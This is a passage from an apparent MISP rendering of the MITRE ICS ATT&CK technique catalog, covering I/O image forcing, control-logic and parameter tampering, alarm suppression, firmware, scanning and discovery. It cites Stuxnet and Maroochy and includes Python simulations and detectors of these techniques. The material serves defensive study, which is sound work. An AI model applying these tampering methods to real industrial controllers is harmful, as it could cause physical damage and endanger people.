Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. During the PLC scan cycle, the state of the actual physical inputs is copied to a portion of the PLC memory, commonly called the input image table. When the program is scanned, it examines the input image table to read the state of a physical input. When the logic determines the state of a physical output, it writes to a portion of the PLC memory commonly called the output image table. The output image may also be examined during the program scan. To update the physical outputs, the output image table contents are copied to the physical outputs after the program is scanned. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.
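
The scan cycle and the force mechanism described above, simulated in Python as an added example for this page (not code from the MITRE ICS ATT&CK project, from any PLC vendor or from the referenced reports). The tank-and-pump process, the point names I0 and Q0, and the way forces are stored are assumptions chosen for the example; real controllers keep force tables in vendor-specific form, but the effect on the image tables is the same.

```python
"""Simulated PLC scan cycle with input/output image tables and forced points.

Constructed process: a tank with a high-level switch (input I0, 1 = full) and a
fill pump (output Q0, 1 = running). The user program runs the pump unless the
tank is full. Forcing a point pins its image-table value regardless of the
physical input or the program logic, which is exactly what an adversary abuses.
"""
from dataclasses import dataclass, field


@dataclass
class PLC:
    physical_inputs: dict = field(default_factory=lambda: {"I0": 0})
    physical_outputs: dict = field(default_factory=lambda: {"Q0": 0})
    input_image: dict = field(default_factory=dict)    # copied from physical inputs each scan
    output_image: dict = field(default_factory=dict)   # written by the user program each scan
    forced_inputs: dict = field(default_factory=dict)  # point -> pinned value
    forced_outputs: dict = field(default_factory=dict) # point -> pinned value

    def user_program(self):
        # Ladder-style logic: Q0 = NOT I0 (run the pump only while the tank is not full).
        self.output_image["Q0"] = 0 if self.input_image["I0"] else 1

    def logic_result(self):
        """What the program would drive without any output force (used by the audit)."""
        return 0 if self.input_image["I0"] else 1

    def scan(self):
        """One scan: read inputs, solve logic, write outputs. Returns the physical outputs."""
        # 1. Physical inputs are copied into the input image table ...
        self.input_image = dict(self.physical_inputs)
        # ... and forced inputs overwrite what the program will see.
        self.input_image.update(self.forced_inputs)
        # 2. The program reads only the input image and writes only the output image.
        self.user_program()
        # 3. Forced outputs override the logic result, then the output image goes to the field.
        self.output_image.update(self.forced_outputs)
        self.physical_outputs = dict(self.output_image)
        return dict(self.physical_outputs)


def audit_forces(plc):
    """Flag every point whose image value disagrees with the field or with the logic.

    A production controller should normally carry no forces at all; a job that
    polls the force table (or compares images against field values) and alerts
    on any non-empty result is the practical check for this technique.
    """
    findings = []
    for point, field_value in plc.physical_inputs.items():
        if plc.input_image.get(point) != field_value:
            findings.append(f"input {point} forced to {plc.input_image[point]} (field reads {field_value})")
    expected_q0 = plc.logic_result()
    if plc.output_image.get("Q0") != expected_q0:
        findings.append(f"output Q0 forced to {plc.output_image['Q0']} (logic wanted {expected_q0})")
    return findings


def run_scenario(tank_full, forced_inputs=None, forced_outputs=None):
    """Run one scan against a given physical state; returns (physical outputs, audit findings)."""
    plc = PLC()
    plc.physical_inputs["I0"] = 1 if tank_full else 0
    plc.forced_inputs.update(forced_inputs or {})
    plc.forced_outputs.update(forced_outputs or {})
    outputs = plc.scan()
    return outputs, audit_forces(plc)


if __name__ == "__main__":
    print(run_scenario(tank_full=True))                            # pump off, no findings
    print(run_scenario(tank_full=True, forced_inputs={"I0": 0}))   # pump runs into a full tank
    print(run_scenario(tank_full=True, forced_outputs={"Q0": 1}))  # same effect from the output side
```

Both forces produce the same physical result (the pump runs against a full tank) while the program logic itself is untouched, which is why a logic checksum alone does not catch this technique; the force table and the image-versus-field comparison are what need to be monitored.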

The tag is: misp-galaxy:mitre-ics-techniques="Manipulate I/O Image"

Table 6964. Table References

Links

https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Manipulation of Control

Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. Methods of Manipulation of Control include: Man-in-the-middle, Spoof command message, Changing setpoints

The tag is: misp-galaxy:mitre-ics-techniques="Manipulation of Control"

Table 6965. Table References

Links

Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.

Masquerading

Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. Applications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.

The tag is: misp-galaxy:mitre-ics-techniques="Masquerading"

Table 6966. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Modify Alarm Settings

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then an Impact could occur. In ICS environments, the adversary may have to use Alarm Suppression or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Alarm Settings"

Table 6967. Table References

Links

https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Modify Control Logic

Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. Program code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active. An adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools. An adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. It is believed this process happened in the lesser known over-pressurizer attacks built into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the "real" pressure is for given analog signals and then automatically linearize the measurement to what would be the "real" pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be "corrected" during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.
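
The linearization tamper described above, together with the alarm-setting and parameter changes described under Modify Alarm Settings, reduced to a small pressure-stage controller in Python as an added example for this page (not code from the MITRE ICS ATT&CK project, from the Langner analysis or from any controller vendor). The calibration table, the valve and alarm thresholds, the 4-20 mA scaling and the bytecode-based fingerprint are assumptions chosen for the example; on a real controller the equivalent of the fingerprint is the program block checksum recorded at commissioning.

```python
"""Pressure stage controller: legitimate calibration vs. tampered logic and settings.

Constructed example. A 4-20 mA pressure transmitter is linearised through a
calibration table into kPa; the controller opens the stage exhaust valve above
EXHAUST_OPEN_KPA and raises a high-pressure alarm above ALARM_SETPOINT_KPA.
Two tampering paths are shown: replacing the linearisation (Modify Control
Logic) and raising the alarm setpoint (Modify Alarm Settings / Modify Parameter).
"""
import hashlib

# Constructed calibration: (signal mA, pressure kPa). 4 mA = 0 kPa, 20 mA = 100 kPa,
# with a mid-scale correction point because real sensors are not perfectly linear.
CAL_TABLE = [(4.0, 0.0), (12.0, 48.0), (20.0, 100.0)]
EXHAUST_OPEN_KPA = 70.0
ALARM_SETPOINT_KPA = 80.0


def linearize(raw_ma, table=CAL_TABLE):
    """Piecewise-linear interpolation of the raw signal into engineering units."""
    if raw_ma <= table[0][0]:
        return table[0][1]
    for (x0, y0), (x1, y1) in zip(table, table[1:]):
        if raw_ma <= x1:
            return y0 + (y1 - y0) * (raw_ma - x0) / (x1 - x0)
    return table[-1][1]


def tampered_linearize(raw_ma, table=CAL_TABLE):
    """Stand-in for overwritten calibration code: every signal is reported as nominal."""
    return 50.0


def control_step(raw_ma, linearize_fn=linearize, alarm_setpoint=ALARM_SETPOINT_KPA):
    """One controller cycle: returns the perceived pressure and the resulting actions."""
    pressure = linearize_fn(raw_ma)
    return {
        "raw_ma": raw_ma,
        "pressure_kpa": pressure,
        "exhaust_open": pressure > EXHAUST_OPEN_KPA,
        "alarm": pressure > alarm_setpoint,
    }


def simulate(readings, **overrides):
    """Run a sequence of raw readings through the controller with optional tampering."""
    return [control_step(r, **overrides) for r in readings]


def logic_fingerprint(fn):
    """SHA-256 over the function's bytecode and constants: a stand-in for the program
    checksum an engineer records at commissioning and compares against the controller later."""
    code = fn.__code__
    return hashlib.sha256(code.co_code + repr(code.co_consts).encode()).hexdigest()


if __name__ == "__main__":
    rising = [8.0, 12.0, 16.0, 20.0]   # constructed ramp up to full scale
    for step in simulate(rising):
        print("good     ", step)
    for step in simulate(rising, linearize_fn=tampered_linearize):
        print("tampered ", step)        # exhaust never opens, alarm never fires
    for step in simulate(rising, alarm_setpoint=10_000.0):
        print("alarm-off", step)        # valve still works, operators never hear about it
    print(logic_fingerprint(linearize) == logic_fingerprint(tampered_linearize))
```

The two tampers differ in what they leave behind: raising the alarm setpoint changes a parameter while the logic checksum stays intact, so it has to be caught by comparing parameters against the engineering baseline, while the replaced linearization changes the logic and shows up in the checksum comparison. Neither is visible from the HMI, which only ever sees the controller's own "corrected" pressure value.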

The tag is: misp-galaxy:mitre-ics-techniques="Modify Control Logic"

Table 6968. Table References

Links

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Modify Parameter

Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Parameter"

Table 6969. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Module Firmware

Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. This technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. An easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following:

Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time.

Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return.

Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator.

A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise.

Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.

The tag is: misp-galaxy:mitre-ics-techniques="Module Firmware"

Table 6970. Table References

Links

https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Monitor Process State

Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.

The tag is: misp-galaxy:mitre-ics-techniques="Monitor Process State"

Table 6971. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Connection Enumeration

Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as netstat, in conjunction with System Firmware, then they can determine the role of certain devices on the network. The adversary can also use Network Sniffing to watch network traffic for details about the source, destination, protocol, and content.

The tag is: misp-galaxy:mitre-ics-techniques="Network Connection Enumeration"

Table 6972. Table References

Links

https://attack.mitre.org/wiki/Technique/T1049

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Service Scanning

Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on specific port numbers, the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most popular tools to use for Network Service Scanning is Nmap. An adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to. Scanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.
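
The noise that port scanning produces, and the quieter targeted probing of specific ports mentioned above, both leave a footprint in connection records. The following Python is an added example for this page (not code from the MITRE ICS ATT&CK project or from the referenced reports) that scores sources by distinct ports and by well-known ICS service ports touched inside a sliding window. The log format, addresses, timestamps and thresholds are constructed assumptions; the port-to-protocol mapping lists the standard TCP ports of those protocols.

```python
"""Port-scan detection over connection records, tuned for ICS service ports.

Constructed example. Input is a simplified firewall/flow log, one line per
connection attempt: timestamp, source, destination, destination port.
A source that touches many distinct ports, or several well-known ICS
service ports, within a short window is reported. Thresholds, the log
format and the addresses are assumptions for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Standard TCP ports of common ICS/OT protocols
ICS_PORTS = {102: "S7comm", 502: "Modbus/TCP", 4840: "OPC UA", 20000: "DNP3", 44818: "EtherNet/IP"}

# Constructed log: an HMI (10.0.5.10) polling a PLC, and a second host (10.0.5.20)
# probing a handful of IT and ICS ports on two PLCs within a couple of seconds.
SAMPLE_LOG = """\
2019-05-01T10:00:00Z 10.0.5.10 10.0.9.11 502
2019-05-01T10:00:05Z 10.0.5.10 10.0.9.11 502
2019-05-01T10:00:10Z 10.0.5.10 10.0.9.11 502
2019-05-01T10:00:11Z 10.0.5.20 10.0.9.11 21
2019-05-01T10:00:11Z 10.0.5.20 10.0.9.11 22
2019-05-01T10:00:11Z 10.0.5.20 10.0.9.11 80
2019-05-01T10:00:12Z 10.0.5.20 10.0.9.11 102
2019-05-01T10:00:12Z 10.0.5.20 10.0.9.11 502
2019-05-01T10:00:12Z 10.0.5.20 10.0.9.12 502
2019-05-01T10:00:13Z 10.0.5.20 10.0.9.12 44818
2019-05-01T10:00:13Z 10.0.5.20 10.0.9.12 20000
2019-05-01T10:10:00Z 10.0.5.10 10.0.9.12 44818
"""


def parse_log(text):
    """Return (time, src, dst, dport) tuples sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(port)))
    return sorted(events)


def detect_port_scans(text, window=timedelta(seconds=60), port_threshold=5, ics_threshold=2):
    """Per source, slide a window over its attempts and report the widest hit.

    port_threshold catches classic broad scans; ics_threshold catches a source
    that probes only a few protocol ports, which is what targeted tooling does.
    """
    by_src = defaultdict(list)
    for ev in parse_log(text):
        by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        start = 0
        for i, (t, _, _, _) in enumerate(evs):
            while evs[start][0] < t - window:
                start += 1
            recent = evs[start:i + 1]
            ports = {p for _, _, _, p in recent}
            targets = {(d, p) for _, _, d, p in recent}
            ics_hits = sorted(p for p in ports if p in ICS_PORTS)
            if len(ports) >= port_threshold or len(ics_hits) >= ics_threshold:
                current = findings.get(src)
                if current is None or len(ports) > current["distinct_ports"]:
                    findings[src] = {
                        "distinct_ports": len(ports),
                        "targets": len(targets),
                        "ics_ports": [f"{p}/{ICS_PORTS[p]}" for p in ics_hits],
                        "first": evs[start][0].isoformat(),
                        "last": t.isoformat(),
                    }
    return findings


if __name__ == "__main__":
    for src, info in detect_port_scans(SAMPLE_LOG).items():
        print(src, info)
```

The HMI's repeated polling of one port never trips either threshold, and its later single connection to an EtherNet/IP port falls outside the window. The lower ICS-port threshold is the practitioner's concession to how quiet targeted probing is; the trade-off is that legitimate engineering tools that enumerate several protocols will also be reported, so the source list should be reconciled against the known engineering workstations. Active scanning of OT networks is also itself a risk: fragile embedded stacks can fault under unexpected probes, which is one more reason to detect it rather than tolerate it.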

The tag is: misp-galaxy:mitre-ics-techniques="Network Service Scanning"

Table 6973. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Sniffing

Network sniffing is the practice of using a network interface on a computer system to monitor or capture information regardless of whether it is the specified destination for the information. An adversary may attempt to sniff the traffic to gain information about the target. This information can vary in its level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. Network sniffing can be a way to discover information for Control Device Identification. In addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

The tag is: misp-galaxy:mitre-ics-techniques="Network Sniffing"

Table 6974. Table References

Links

https://attack.mitre.org/wiki/Technique/T1040

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

https://www.youtube.com/watch?v=yuZazP22rpI

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Point & Tag Identification

Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process-specific variables. Tags are the identifiers given to points for operator convenience. Collecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.

The tag is: misp-galaxy:mitre-ics-techniques="Point & Tag Identification"

Table 6975. Table References

Links

Backdoor.Oldrea enumerates all OPC tags and queries for specific fields such as server state, tag name, type, access, and id

https://www.fireeye.com/blog/threat-research/2014/07/havex-its-down-with-opc.html

Program Download

Adversaries may perform a program download to load malicious or unintended program logic on a device as a method of persistence or to disrupt response functions or process control. Program download onto devices, such as PLCs, allows adversaries to implement custom logic. Malicious PLC programs may be used to disrupt physical processes or enable adversary persistence. The act of a program download will cause the PLC to enter a STOP operation state, which may prevent response functions from operating correctly.

The tag is: misp-galaxy:mitre-ics-techniques="Program Download"

Table 6976. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Program Organization Units

Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. Stuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected: increase the size of the original block; write malicious code to the beginning of the block; insert the original OB1 code after the malicious code.

The tag is: misp-galaxy:mitre-ics-techniques="Program Organization Units"

Table 6977. Table References

Links

Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior.

https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6560_PracticalApplications_MW_20120224_Web.pdf?v=20151125-003051

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Program Upload

Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.

The tag is: misp-galaxy:mitre-ics-techniques="Program Upload"

Table 6978. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Project File Infection

Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. Using built-in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment, enabling further execution and persistence techniques. Adversaries may export their own code into project files with conditions to execute at specific intervals. Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC, the workstation device may be disconnected with the infected project file still executing.

The tag is: misp-galaxy:mitre-ics-techniques="Project File Infection"

Table 6979. Table References

Links

https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=

http://www.plcdev.com/book/export/html/373

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Remote File Copy

Adversaries may copy files from one system to another to stage adversary tools or other files over the course of an operation. Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. In control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.

The tag is: misp-galaxy:mitre-ics-techniques="Remote File Copy"

Table 6980. Table References

Links

WannaCry can move laterally through industrial networks by means of the SMB service.

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Remote System Discovery

Remote System Discovery is the process of identifying the presence of hosts on a network, and details about them. This process is common to network administrators validating the presence of machines and services, as well as adversaries mapping out a network for future attack targets. An adversary may attempt to gain information about the target network via network enumeration techniques such as port scanning. One of the most popular tools for enumeration is Nmap. Remote System Discovery allows adversaries to map out hosts on the network as well as the TCP/IP ports that are open, closed, or filtered. Remote System Discovery tools also aid in by attempting to connect to the service and determine its exact version. The adversary may use this information to pick an exploit for a particular version if a known vulnerability exists.

The tag is: misp-galaxy:mitre-ics-techniques="Remote System Discovery"

Table 6981. Table References

Links

https://attack.mitre.org/wiki/Technique/T1018

https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Replication Through Removable Media

Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. Operators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. The plant has since checked for infection and cleaned up more than 1,000 computers. An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution.

The tag is: misp-galaxy:mitre-ics-techniques="Replication Through Removable Media"

Table 6982. Table References

Links

https://www.kkw-gundremmingen.de/presse.php?id=571

Stuxnet was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment. The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened.

https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant

https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/

https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/

https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298

https://www.bbc.com/news/technology-36158606

https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/

https://support.symantec.com/us/en/article.tech93179.html

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Rogue Master Device

Adversaries may set up a rogue master to leverage control server functions to communicate with slave devices. A rogue master device can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master device. Impersonating a master device may also allow an adversary to avoid detection. In the Maroochy Attack, Vitek Boden falsified network addresses in order to send false data and instructions to pumping stations.

The tag is: misp-galaxy:mitre-ics-techniques="Rogue Master Device"

Table 6983. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Role Identification

Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack. For example, a power generation plant may have unique devices such as one that monitors the power output of a generator and another that controls the speed of a turbine. Examining device roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary’s decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device.

The tag is: misp-galaxy:mitre-ics-techniques="Role Identification"

Table 6984. Table References

Links

Ensure ICS and IT network cables are kept separate and that devices are locked up when possible, to reduce the likelihood they can be tampered with.

https://www.f-secure.com/weblog/archives/00002718.html

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Rootkit

